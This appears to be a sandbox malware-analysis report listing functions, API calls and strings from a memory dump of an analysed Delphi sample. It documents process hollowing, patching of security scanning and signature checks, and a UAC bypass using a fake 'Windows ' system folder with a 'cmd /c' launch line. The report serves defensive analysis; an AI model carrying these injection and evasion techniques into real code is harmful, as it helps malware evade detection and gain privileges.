UacScan, xrefs: 02D6CC5A, 02D6D1C2, 02D6D2BA, 02D6D856, 02D6E824, 02D6ED86, 02D6F66C, 02D6FC87, 02D70EB8, 02D711E6, 02D71C7D, 02D72064, 02D72256, 02D72371, 02D74544, 02D745E9, 02D74784, 02D74AD3, 02D74E67, 02D74F74, 02D75149, 02D75594, 02D75713, 02D75A7E, 02D75BA0, 02D75EF5, 02D76012, 02D762C4
psapi, xrefs: 02D76A21
CryptSIPVerifyIndirectData, xrefs: 02D6CEB0
EnumServicesStatusExA, xrefs: 02D769FE
DllRegisterServer, xrefs: 02D6D189
EnumServicesStatusW, xrefs: 02D769EF
NtOpenFile, xrefs: 02D77217
WriteVirtualMemory, xrefs: 02D76CDA
VirtualProtect, xrefs: 02D76C74
.url, xrefs: 02D70A03
C:\Windows\SysWOW64, xrefs: 02D722CC
Kernel32, xrefs: 02D76A30, 02D76A3F, 02D76A8A
WinHttp.WinHttpRequest.5.1, xrefs: 02D6F6E2
.png, xrefs: 02D6DBC3, 02D6E2CB, 02D772BB, 02D77301, 02D7734B, 02D77372
CreateProcessA, xrefs: 02D76A2B

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: File$Path$Name$AttributesCloseCreateLibraryModuleName_$AddressCacheCurrentDirectoryFlushFreeHandleInetInformationInstructionLoadOfflineOpenProcProcessProtectQueryReadVirtualWrite
String ID: .png$.url$@^@$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\Libraries$C:\Windows\SysWOW64$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\System32\\easinvoker.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$DEEX$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TMo$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$^^Nc$acS$advapi32$bcrypt$can$cmd /c "C:\\Windows \\System32\\easinvoker.exe"$connect$endpointdlp$http$iexpress.exe$kernel32$mssip32$ntdll$psapi$smartscreenps$spp$sppc$sppwmi$wintrust$ws2_32
API String ID: 3218856063-1480193501
Opcode ID: cf6fc7c537f1d8476a34bddf7ba5327c39e8b16e6a4424e66f39f68392b21ab4
Instruction ID: 7b304d6e367fceec1b4f93b5c466b5295ae8bbe31fb95df223e79b426e31e4f0
Opcode Fuzzy Hash: cf6fc7c537f1d8476a34bddf7ba5327c39e8b16e6a4424e66f39f68392b21ab4
Instruction Fuzzy Hash: 63F3FC34B40119ABEB11EB64ED90ECEB3BAEF44300F5144E5E009ABB54DB75AE85CF64

Uniqueness

Uniqueness Score: -1.00%

Function 02D37E40 Relevance: 43.5, APIs: 8, Strings: 16, Instructions: 1478
nativethreadprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02D2FD40: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,02D2FE08), ref: 02D2FD78
Part of subcall function 02D2FD40: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,02D2FE08), ref: 02D2FD86
Part of subcall function 02D2FD40: GetProcAddress.KERNEL32(74B00000,00000000), ref: 02D2FD9F
Part of subcall function 02D2FD40: VirtualProtect.KERNEL32(02DAD35C,6FC0FFFF,00000040,02DAD360,74B00000,00000000,00000000,00000000,00000000,00000000,00000000,02D2FE08), ref: 02D2FDBA
Part of subcall function 02D2FD40: GetCurrentProcess.KERNEL32(00000000,00000000,02DAD35C,6FC0FFFF,00000040,02DAD360,74B00000,00000000,00000000,00000000,00000000,00000000,00000000,02D2FE08), ref: 02D2FDD7
Part of subcall function 02D2FD40: FlushInstructionCache.KERNEL32(00000000,00000000,00000000,02DAD35C,6FC0FFFF,00000040,02DAD360,74B00000,00000000,00000000,00000000,00000000,00000000,00000000,02D2FE08), ref: 02D2FDDD
Part of subcall function 02D2FD40: FreeLibrary.KERNEL32(74B00000,00000000,00000000,00000000,02DAD35C,6FC0FFFF,00000040,02DAD360,74B00000,00000000,00000000,00000000,00000000,00000000,00000000,02D2FE08), ref: 02D2FDE8

CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02DAD408,02DAD3F8,OpenSession,02DAD3D0,02D39704,ScanString,02DAD3D0), ref: 02D382CD
GetThreadContext.KERNEL32(000008AC,02DAD44C,ScanString,02DAD3D0,02D39704,UacInitialize,02DAD3D0,02D39704,ScanBuffer,02DAD3D0,02D39704,ScanBuffer,02DAD3D0,02D39704,OpenSession,02DAD3D0), ref: 02D385C2
NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(000008B0,0024DFF8,02DAD520,00000004,02DAD528,ScanBuffer,02DAD3D0,02D39704,ScanString,02DAD3D0,02D39704,Initialize,02DAD3D0,02D39704,UacScan,02DAD3D0), ref: 02D3881F
NtUnmapViewOfSection.N(000008B0,00400000,ScanBuffer,02DAD3D0,02D39704,ScanString,02DAD3D0,02D39704,Initialize,02DAD3D0,02D39704,000008B0,0024DFF8,02DAD520,00000004,02DAD528), ref: 02D3899A

Part of subcall function 02D2FB88: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02D2FB95
Part of subcall function 02D2FB88: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02D2FB9B
Part of subcall function 02D2FB88: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02D2FBBB

NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(000008B0,00400000,00000000,17C1E400,02DAD528,ScanBuffer,02DAD3D0,02D39704,ScanString,02DAD3D0,02D39704,Initialize,02DAD3D0,02D39704,ScanBuffer,02DAD3D0), ref: 02D38F7D
NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(000008B0,0024DFF8,02DAD524,00000004,02DAD528,ScanBuffer,02DAD3D0,02D39704,ScanString,02DAD3D0,02D39704,Initialize,02DAD3D0,02D39704,000008B0,00400000), ref: 02D390F0
SetThreadContext.KERNEL32(000008AC,02DAD44C,ScanBuffer,02DAD3D0,02D39704,ScanString,02DAD3D0,02D39704,Initialize,02DAD3D0,02D39704,000008B0,0024DFF8,02DAD524,00000004,02DAD528), ref: 02D39266
NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(000008AC,00000000,000008AC,02DAD44C,ScanBuffer,02DAD3D0,02D39704,ScanString,02DAD3D0,02D39704,Initialize,02DAD3D0,02D39704,000008B0,0024DFF8,02DAD524), ref: 02D39273

Part of subcall function 02D2FCE0: LoadLibraryW.KERNEL32(bcrypt,02D39704,ScanString,02DAD3D0,02D39704,Initialize,02DAD3D0,02D39704,UacScan,02DAD3D0,02D39704,UacInitialize,02DAD3D0,02D39704,000008AC,02DAD44C), ref: 02D2FCF2
Part of subcall function 02D2FCE0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02D2FCFF
Part of subcall function 02D2FCE0: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(000008B0,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,02D39704,ScanString,02DAD3D0,02D39704,Initialize,02DAD3D0,02D39704,UacScan), ref: 02D2FD16
Part of subcall function 02D2FCE0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,02D39704,ScanString,02DAD3D0,02D39704,Initialize,02DAD3D0,02D39704,UacScan,02DAD3D0,02D39704,UacInitialize,02DAD3D0), ref: 02D2FD25

Strings

ntdll, xrefs: 02D39574, 02D39588, 02D395B0
UacScan, xrefs: 02D37EEA, 02D38102, 02D38647, 02D38A43, 02D38BB7, 02D392F0
ScanBuffer, xrefs: 02D37E79, 02D37F43, 02D37FCB, 02D383BF, 02D38461, 02D3879A, 02D38921, 02D38AB4, 02D38D3D, 02D38EFB, 02D3906B, 02D391DE, 02D393D2, 02D39637
NtOpenObjectAuditAlarm, xrefs: 02D39583
OpenSession, xrefs: 02D3822B, 02D3834E, 02D395C6
advapi32, xrefs: 02D3959C
NtReadVirtualMemory, xrefs: 02D3956F
BCryptQueryProviderRegistration, xrefs: 02D394D6
UacInitialize, xrefs: 02D380A9, 02D382DD, 02D384D2, 02D385D6, 02D389D2, 02D38B46, 02D3927F
BCryptVerifySignature, xrefs: 02D394C2
NtSetSecurityObject, xrefs: 02D395AB
ScanString, xrefs: 02D38024, 02D381BA, 02D38543, 02D38729, 02D388B0, 02D38CCC, 02D38E8A, 02D38FFA, 02D3916D, 02D39458, 02D39505
Initialize, xrefs: 02D3815B, 02D386B8, 02D3883F, 02D38C28, 02D38E19, 02D38F89, 02D390FC, 02D39361
I_QueryTagInformation, xrefs: 02D39597
BCryptRegisterProvider, xrefs: 02D394EA
bcrypt, xrefs: 02D394C7, 02D394DB, 02D394EF

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Virtual$Memory$Library$AddressProcThreadWrite$ContextFreeHandleLoadModuleProcess$AllocateCacheCreateCurrentFlushInstructionProtectReadResumeSectionUnmapUserView
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$NtOpenObjectAuditAlarm$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$ntdll
API String ID: 4114221206-1058128293
Opcode ID: 49c183535d8d41140a04a4cf180e74145008d253e62bb017ef03d83a648e5080
Instruction ID: 28d19171fda4e1a25d39d267c1da38bf37f3e31881cdc41597a4a9695480dbc8
Opcode Fuzzy Hash: 49c183535d8d41140a04a4cf180e74145008d253e62bb017ef03d83a648e5080
Instruction Fuzzy Hash: CFD20975B00129ABDB11EBA4ED90FCEB3BBEF45300F1145A5E009ABB54DA70AE458F64

Uniqueness

Uniqueness Score: -1.00%

Function 02D15DDC Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184
registrystringlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105,02D10000,02D7A794), ref: 02D15DF8
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02D10000,02D7A794), ref: 02D15E16
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02D10000,02D7A794), ref: 02D15E34
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02D15E52
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02D15EE1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02D15E9B
RegQueryValueExA.ADVAPI32(?,02D16048,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02D15EE1,?,80000001), ref: 02D15EB9
RegCloseKey.ADVAPI32(?,02D15EE8,00000000,?,?,00000000,02D15EE1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02D15EDB
lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02D15EF8
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02D15F05
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02D15F0B
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02D15F36
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02D15F7D
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02D15F8D
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02D15FB5
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02D15FC5
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02D15FEB
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02D15FFB

Strings

Software\Borland\Locales, xrefs: 02D15E0C, 02D15E2A
Software\Borland\Delphi\Locales, xrefs: 02D15E48

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1759228003-2375825460
Opcode ID: 0887ac9f03a0df586b560a060e74f2690fc16e0265f7d3087d8f0e3e0772e090
Instruction ID: cda8c06c5b903ffac0325ffbe73782748ee543c190186d2fc73110bc192b80f1
Opcode Fuzzy Hash: 0887ac9f03a0df586b560a060e74f2690fc16e0265f7d3087d8f0e3e0772e090
Instruction Fuzzy Hash: EB517075E4025C7AFB25D6A4BC46FEF7BADDB04744F4040A1AB04E6A81E674DE48CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02D2FCE0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40
librarynativeloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(bcrypt,02D39704,ScanString,02DAD3D0,02D39704,Initialize,02DAD3D0,02D39704,UacScan,02DAD3D0,02D39704,UacInitialize,02DAD3D0,02D39704,000008AC,02DAD44C), ref: 02D2FCF2
GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02D2FCFF
NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(000008B0,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,02D39704,ScanString,02DAD3D0,02D39704,Initialize,02DAD3D0,02D39704,UacScan), ref: 02D2FD16
FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,02D39704,ScanString,02DAD3D0,02D39704,Initialize,02DAD3D0,02D39704,UacScan,02DAD3D0,02D39704,UacInitialize,02DAD3D0), ref: 02D2FD25

Strings

BCryptVerifySignature, xrefs: 02D2FCFD
bcrypt, xrefs: 02D2FCF1

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
String ID: BCryptVerifySignature$bcrypt
API String ID: 1002360270-4067648912
Opcode ID: ece893b0ffbecbd27c2bb3bc77372916519f0cd7f089f3767dd8ee979062c27d
Instruction ID: d7454b78350128803550f48d9b9bbb60bee0b1bb2bfe4020e73be8db358120dc
Opcode Fuzzy Hash: ece893b0ffbecbd27c2bb3bc77372916519f0cd7f089f3767dd8ee979062c27d
Instruction Fuzzy Hash: 7CF02E712092243EE12052646D40EBF62ADCBD27B4F004B3DF95486781D761DD08C3F1

Uniqueness

Uniqueness Score: -1.00%

Function 02D2FB86 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24
librarymemorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02D2FB95
GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02D2FB9B
NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02D2FBBB

Strings

NtAllocateVirtualMemory, xrefs: 02D2FB8B
C:\Windows\System32\ntdll.dll, xrefs: 02D2FB90

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: AddressAllocateHandleMemoryModuleProcVirtual
String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
API String ID: 421316089-2206134580
Opcode ID: 8eaa98d09531dc20bdaa3a121a8a013817bb40f034853177baf82410355cb26d
Instruction ID: 5d499403185250c8f87c986800b31244b2a46b283ef1d6c16a15f4885bc351ee
Opcode Fuzzy Hash: 8eaa98d09531dc20bdaa3a121a8a013817bb40f034853177baf82410355cb26d
Instruction Fuzzy Hash: 95E07576640208BFEB40DF98E945EDA37EDEB28750F404415FA19C7600D670ED148BB1

Uniqueness

Uniqueness Score: -1.00%

Function 02D2FB88 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23
librarymemorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02D2FB95
GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02D2FB9B
NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02D2FBBB

Strings

NtAllocateVirtualMemory, xrefs: 02D2FB8B
C:\Windows\System32\ntdll.dll, xrefs: 02D2FB90

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: AddressAllocateHandleMemoryModuleProcVirtual
String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
API String ID: 421316089-2206134580
Opcode ID: 3c611658ee24e80878271c789ff65decbacafab7be14d8ab65f143c7d66868b5
Instruction ID: a77ce0cc1db90197fd30a2e920919717d9828a80dee3ce30a8ead185d2cecf15
Opcode Fuzzy Hash: 3c611658ee24e80878271c789ff65decbacafab7be14d8ab65f143c7d66868b5
Instruction Fuzzy Hash: 99E07576640208BFDB40DF98E945EDA37EDAB28750F404415FA19C7600D670E9148BB1

Uniqueness

Uniqueness Score: -1.00%

Function 02D6B714 Relevance: 7.6, APIs: 5, Instructions: 80
nativefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02D15228: SysAllocStringLen.OLEAUT32(?,?), ref: 02D15236

RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02D6B7E4), ref: 02D6B74F
NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02D6B7E4), ref: 02D6B77F
NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02D6B794
NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02D6B7C0
NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02D6B7C9

Part of subcall function 02D14F68: SysFreeString.OLEAUT32(02D6C8BC), ref: 02D14F76

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
String ID:
API String ID: 1897104825-0
Opcode ID: 454fcd1da3bb4fc10d0bd5a2cef237e0f65b5be28b7725ca7f0d4d2cdb0d76fa
Instruction ID: bf169d7addb6b5630848f9ca75db285c449d45355e0de801693f1a14600c89dd
Opcode Fuzzy Hash: 454fcd1da3bb4fc10d0bd5a2cef237e0f65b5be28b7725ca7f0d4d2cdb0d76fa
Instruction Fuzzy Hash: 6921F471A40718BBEB11E694DC46FDEB7BDEB48700F500462F600F76C0DA74AE058BA4

Uniqueness

Uniqueness Score: -1.00%

Function 02D6BAE4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02D6BC22

Strings

OpenSession, xrefs: 02D6BBC4
Initialize, xrefs: 02D6BB12
ScanBuffer, xrefs: 02D6BB6B

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: CheckConnectionInternet
String ID: Initialize$OpenSession$ScanBuffer
API String ID: 3847983778-3852638603
Opcode ID: 15a4c93796d65685d73c2fd3989bfe830106fc081975dfc6b1f9b6a179cbe01c
Instruction ID: 6eea25d6413cdc7314dcee0d848c78f4da62e5459fde0e1f3d0adfaea380e716
Opcode Fuzzy Hash: 15a4c93796d65685d73c2fd3989bfe830106fc081975dfc6b1f9b6a179cbe01c
Instruction Fuzzy Hash: B541CD31B40209AFDB04EBA4E991E9EB3FBEF48704F514426E441F7754DA71AE068F64

Uniqueness

Uniqueness Score: -1.00%

Function 02D6B630 Relevance: 6.1, APIs: 4, Instructions: 80
nativefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02D15228: SysAllocStringLen.OLEAUT32(?,?), ref: 02D15236

RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02D6B702), ref: 02D6B66F
NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02D6B6A9
NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02D6B6D6
NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02D6B6DF

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: FilePath$AllocCloseCreateNameName_StringWrite
String ID:
API String ID: 3764614163-0
Opcode ID: 9144d63a78d27978d3602e24281ae28432f6c75e4e6629002491e41029b1d1b4
Instruction ID: b75c8dd6ba85ea72208e17d5eee57a0568e1be97b2dbc0559aedbc4dca1ffd6d
Opcode Fuzzy Hash: 9144d63a78d27978d3602e24281ae28432f6c75e4e6629002491e41029b1d1b4
Instruction Fuzzy Hash: 2B21E071A40218BAEB11EAA4DC46FDEB7BDDB04B00F614462F600F76C0D7B46F048A64

Uniqueness

Uniqueness Score: -1.00%

Function 02D6B5A8 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02D15228: SysAllocStringLen.OLEAUT32(?,?), ref: 02D15236

RtlInitUnicodeString.N(?,?,00000000,02D6B622), ref: 02D6B5D0
RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02D6B622), ref: 02D6B5E6
NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02D6B622), ref: 02D6B605

Part of subcall function 02D14F68: SysFreeString.OLEAUT32(02D6C8BC), ref: 02D14F76

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
String ID:
API String ID: 1694942484-0
